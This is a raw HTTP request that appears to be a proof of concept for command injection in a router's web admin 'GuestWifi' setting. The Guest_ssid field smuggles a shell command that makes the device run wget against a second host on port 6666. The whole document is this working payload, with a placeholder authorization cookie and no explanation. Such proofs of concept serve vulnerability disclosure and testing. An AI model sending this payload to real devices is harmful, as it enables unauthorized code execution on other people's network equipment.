POST / HTTP/1.1
Host: 192.168.6.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 102
Origin: http://192.168.6.2
Connection: keep-alive
Referer: http://192.168.6.2/
Cookie: Authorization=REPLACE_ME

page=GuestWifi&guestEn=1&Guest_ssid=test;wget http://192.168.6.1:6666/testpoc;&Guest_password=password